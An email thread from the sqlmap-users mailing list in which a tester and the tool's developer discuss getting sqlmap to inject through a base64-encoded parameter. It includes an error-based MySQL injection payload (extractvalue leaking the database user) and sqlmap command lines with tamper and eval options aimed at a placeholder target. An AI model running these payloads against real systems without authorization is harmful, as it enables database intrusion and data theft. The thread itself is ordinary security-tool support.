Just as a note - I had to do data.encode("base64").strip() to remove the
newline which the encode adds.
--
Konrads Smelkovs
Applied IT sorcery.
On 3 November 2014 07:29, Konrads Smelkovs <konr...@smelkovs.com> wrote:
> Cheers, works!
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 2 November 2014 17:10, Miroslav Stampar <miroslav.stam...@gmail.com>
> wrote:
>
>> Then please try --eval instead of --tamper.
>>
>> E.g. --eval="param=param.encode('base64')"
>>
>> Bye
>> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
>>
>>> Miroslav,
>>>
>>> I previously exploited this manually. The injection occurs in the mysql
>>> INSERT statement. If the statement is invalid, we get an error message in
>>> html comments like so:
>>>
>>> <!--You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use near
>>> ''lalalaa))) or'')' at line 1-->
>>>
>>> Which then is exploitable using some well documented methods such as
>>> appending string like this:
>>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>>
>>> which gives us a nice error:
>>> <!--XPATH syntax error: '~root@localhost'-->
>>>
>>>
>>> Anyhow, I got halfway there with the following string:
>>> sqlmap -u '
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>>> correct initial URL stability check vector:
>>>
>>> 1st request URL:
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>>> 2nd request URL: https://target/script.php?
>>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>>
>>> Also none of the test vectors seem to trigger an error response.
>>>
>>> I tried with --risk=3 with no avail.
>>>
>>> version: 1.0-dev-1ef2c40
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com>
>>> wrote:
>>>
>>>> Hi.
>>>>
>>>> In your case I would do this:
>>>>
>>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>>> form (e.g. id=123 instead of original id=313233)
>>>> 2) Use --tamper=base64encode
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com
>>>> > wrote:
>>>>
>>>>> Hello,
>>>>>
>>>>> I am writing a small modification which would allow to tamper/decode
>>>>> variables in the request?
>>>>> As I understand that the parameters are decoded/parsed into a dict
>>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>>> full, parsed dict of the get/post/cookie values?
>>>>>
>>>>> (specifically I have a base64 encoded string as a parameter and to
>>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>>> then encoded back)
>>>>>
>>>>>
>>>>> --
>>>>> Konrads Smelkovs
>>>>> Applied IT sorcery.
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sqlmap-users@lists.sourceforge.net
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
